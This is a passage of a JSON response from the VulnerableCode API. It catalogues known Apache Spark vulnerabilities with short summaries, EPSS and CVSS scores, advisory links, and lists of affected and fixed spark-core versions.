                    "purl": "pkg:maven/org.apache.spark/spark-core_2.11@2.1.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1gtx-thb1-9ud6"
                        },
                        {
                            "vulnerability": "VCID-as3y-ffvw-rube"
                        },
                        {
                            "vulnerability": "VCID-m3tv-j5mk-4ufj"
                        },
                        {
                            "vulnerability": "VCID-pa42-1gk4-9yhj"
                        },
                        {
                            "vulnerability": "VCID-pgne-36yk-37bj"
                        },
                        {
                            "vulnerability": "VCID-vqmm-ru8x-ukcx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.1.2"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/24316?format=api",
                    "purl": "pkg:maven/org.apache.spark/spark-core_2.11@2.2.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1gtx-thb1-9ud6"
                        },
                        {
                            "vulnerability": "VCID-as3y-ffvw-rube"
                        },
                        {
                            "vulnerability": "VCID-pa42-1gk4-9yhj"
                        },
                        {
                            "vulnerability": "VCID-pgne-36yk-37bj"
                        },
                        {
                            "vulnerability": "VCID-vqmm-ru8x-ukcx"
                        },
                        {
                            "vulnerability": "VCID-y6p4-rd9t-cqad"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.2.0"
                }
            ],
            "aliases": [
                "CVE-2017-7678",
                "GHSA-r34r-f84j-5x4x"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-adht-u2kn-j3hh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/10071?format=api",
            "vulnerability_id": "VCID-as3y-ffvw-rube",
            "summary": "Improper Authentication\nIn all versions of Apache Spark, the standalone resource manager accepts code to execute on a `master` host, that then runs that code on `worker` hosts. The master itself does not, by design, execute user code. A specially-crafted request to the master can, however, cause the master to execute code too. Note that this does not affect standalone clusters with authentication enabled. While the master host typically has less outbound access to other resources than a worker, the execution of code on the master is nevertheless unexpected.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2018-17190",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79078",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78945",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78972",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78956",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78981",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78987",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79011",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78996",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78986",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79014",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.7901",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79044",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.7905",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.79065",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.0121",
                            "scoring_system": "epss",
                            "scoring_elements": "0.78939",
                            "published_at": "2026-04-01T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2018-17190"
                },
                {
                    "reference_url": "https://lists.apache.org/thread.html/341c3187f15cdb0d353261d2bfecf2324d56cb7db1339bfc7b30f6e5@%3Cdev.spark.apache.org%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://lists.apache.org/thread.html/341c3187f15cdb0d353261d2bfecf2324d56cb7db1339bfc7b30f6e5@%3Cdev.spark.apache.org%3E"
                },
                {
                    "reference_url": "https://security.gentoo.org/glsa/201903-21",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://security.gentoo.org/glsa/201903-21"
                },
                {
                    "reference_url": "https://www.oracle.com/security-alerts/cpujul2020.html",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.oracle.com/security-alerts/cpujul2020.html"
                },
                {
                    "reference_url": "http://www.securityfocus.com/bid/105976",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "http://www.securityfocus.com/bid/105976"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17190",
                    "reference_id": "CVE-2018-17190",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17190"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-phg2-9c5g-m4q7",
                    "reference_id": "GHSA-phg2-9c5g-m4q7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-phg2-9c5g-m4q7"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2018-17190",
                "GHSA-phg2-9c5g-m4q7"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-as3y-ffvw-rube"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/10005?format=api",
            "vulnerability_id": "VCID-m3tv-j5mk-4ufj",
            "summary": "Improper Input Validation\nThe Apache Spark Maven-based build includes a convenience script, `build/mvn`, that downloads and runs a zinc server to speed up compilation. It has been included in release branches since, up to and including master. This server will accept connections from external hosts by default. A specially-crafted request to the zinc server could cause it to reveal information in files readable to the developer account running the build.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2018-11804",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00681",
                            "scoring_system": "epss",
                            "scoring_elements": "0.7167",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72461",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72465",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72456",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72413",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72425",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72416",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72374",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72387",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72403",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.7238",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72328",
                            "published_at": "2026-04-01T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72352",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72329",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72333",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00716",
                            "scoring_system": "epss",
                            "scoring_elements": "0.72368",
                            "published_at": "2026-04-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2018-11804"
                },
                {
                    "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        }
                    ],
                    "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"
                },
                {
                    "reference_url": "https://github.com/apache/spark",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/apache/spark"
                },
                {
                    "reference_url": "https://lists.apache.org/thread.html/2b11aa4201e36f2ec8f728e722fe33758410f07784379cbefd0bda9d@%3Cdev.spark.apache.org%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://lists.apache.org/thread.html/2b11aa4201e36f2ec8f728e722fe33758410f07784379cbefd0bda9d@%3Cdev.spark.apache.org%3E"
                },
                {
                    "reference_url": "https://lists.apache.org/thread.html/2b11aa4201e36f2ec8f728e722fe33758410f07784379cbefd0bda9d%40%3Cdev.spark.apache.org%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://lists.apache.org/thread.html/2b11aa4201e36f2ec8f728e722fe33758410f07784379cbefd0bda9d%40%3Cdev.spark.apache.org%3E"
                },
                {
                    "reference_url": "https://spark.apache.org/security.html#CVE-2018-11804",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://spark.apache.org/security.html#CVE-2018-11804"
                },
                {
                    "reference_url": "https://web.archive.org/web/20200227103903/http://www.securityfocus.com/bid/105756",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://web.archive.org/web/20200227103903/http://www.securityfocus.com/bid/105756"
                },
                {
                    "reference_url": "http://www.securityfocus.com/bid/105756",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "http://www.securityfocus.com/bid/105756"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11804",
                    "reference_id": "CVE-2018-11804",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11804"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-62g2-m955-v383",
                    "reference_id": "GHSA-62g2-m955-v383",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-62g2-m955-v383"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/24316?format=api",
                    "purl": "pkg:maven/org.apache.spark/spark-core_2.11@2.2.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1gtx-thb1-9ud6"
                        },
                        {
                            "vulnerability": "VCID-as3y-ffvw-rube"
                        },
                        {
                            "vulnerability": "VCID-pa42-1gk4-9yhj"
                        },
                        {
                            "vulnerability": "VCID-pgne-36yk-37bj"
                        },
                        {
                            "vulnerability": "VCID-vqmm-ru8x-ukcx"
                        },
                        {
                            "vulnerability": "VCID-y6p4-rd9t-cqad"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.2.0"
                }
            ],
            "aliases": [
                "CVE-2018-11804",
                "GHSA-62g2-m955-v383"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-m3tv-j5mk-4ufj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9748?format=api",
            "vulnerability_id": "VCID-pa42-1gk4-9yhj",
            "summary": "Improper Authentication\nApache Spark standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property `spark.authenticate.secret` establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API.",
            "references": [
                {
                    "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-11770.json",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        }
                    ],
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-11770.json"
                },
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2018-11770",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99533",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99532",
                            "published_at": "2026-04-29T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.9953",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99529",
                            "published_at": "2026-04-18T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99523",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99527",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99526",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99525",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99524",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.88996",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99528",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.8957",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99554",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.8957",
                            "scoring_system": "epss",
                            "scoring_elements": "0.99553",
                            "published_at": "2026-04-02T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2018-11770"
                },
                {
                    "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        }
                    ],
                    "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"
                },
                {
                    "reference_url": "https://lists.apache.org/thread.html/bd8e51314041451a2acd720e9223fc1c15a263ccacb396a75b1fc485@%3Cdev.spark.apache.org%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://lists.apache.org/thread.html/bd8e51314041451a2acd720e9223fc1c15a263ccacb396a75b1fc485@%3Cdev.spark.apache.org%3E"
                },
                {
                    "reference_url": "https://lists.apache.org/thread.html/bd8e51314041451a2acd720e9223fc1c15a263ccacb396a75b1fc485%40%3Cdev.spark.apache.org%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://lists.apache.org/thread.html/bd8e51314041451a2acd720e9223fc1c15a263ccacb396a75b1fc485%40%3Cdev.spark.apache.org%3E"
                },
                {
                    "reference_url": "https://spark.apache.org/security.html#CVE-2018-11770",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://spark.apache.org/security.html#CVE-2018-11770"
                },
                {
                    "reference_url": "https://web.archive.org/web/20200227114942/http://www.securityfocus.com/bid/105097",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://web.archive.org/web/20200227114942/http://www.securityfocus.com/bid/105097"
                },
                {
                    "reference_url": "http://www.securityfocus.com/bid/105097",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [],
                    "url": "http://www.securityfocus.com/bid/105097"
                },
                {
                    "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1615652",
                    "reference_id": "1615652",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1615652"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11770",
                    "reference_id": "CVE-2018-11770",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11770"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w4r4-65mg-45x2",
                    "reference_id": "GHSA-w4r4-65mg-45x2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w4r4-65mg-45x2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/78930?format=api",
                    "purl": "pkg:maven/org.apache.spark/spark-core_2.11@2.3.3",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1gtx-thb1-9ud6"
                        },
                        {
                            "vulnerability": "VCID-as3y-ffvw-rube"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.3.3"
                }
            ],
            "aliases": [
                "CVE-2018-11770",
                "GHSA-w4r4-65mg-45x2"
            ],
            "risk_score": 10.0,
            "exploitability": "2.0",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pa42-1gk4-9yhj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/5918?format=api",
            "vulnerability_id": "VCID-vqmm-ru8x-ukcx",
            "summary": "Prior to Spark 2.3.3, in certain situations Spark would write user data to local disk unencrypted, even if spark.io.encryption.enabled=true. This includes cached blocks that are fetched to disk (controlled by spark.maxRemoteBlockSizeFetchToMem); in SparkR, using parallelize; in Pyspark, using broadcast and parallelize; and use of python udfs.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-10099",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00285",
                            "scoring_system": "epss",
                            "scoring_elements": "0.51783",
                            "published_at": "2026-05-05T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67612",
                            "published_at": "2026-04-01T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67648",
                            "published_at": "2026-04-02T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67669",
                            "published_at": "2026-04-04T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67649",
                            "published_at": "2026-04-07T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.677",
                            "published_at": "2026-04-08T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67714",
                            "published_at": "2026-04-09T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67738",
                            "published_at": "2026-04-11T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67723",
                            "published_at": "2026-04-12T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6769",
                            "published_at": "2026-04-13T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67725",
                            "published_at": "2026-04-16T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67739",
                            "published_at": "2026-04-24T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6772",
                            "published_at": "2026-04-21T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6775",
                            "published_at": "2026-04-26T12:55:00Z"
                        },
                        {
                            "value": "0.00542",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67752",
                            "published_at": "2026-04-29T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-10099"
                },
                {
                    "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N"
                        }
                    ],
                    "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"
                },
                {
                    "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyspark/PYSEC-2019-114.yaml",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyspark/PYSEC-2019-114.yaml"
                },
                {
                    "reference_url": "https://lists.apache.org/thread.html/c2a39c207421797f82823a8aff488dcd332d9544038307bf69a2ba9e@%3Cuser.spark.apache.org%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
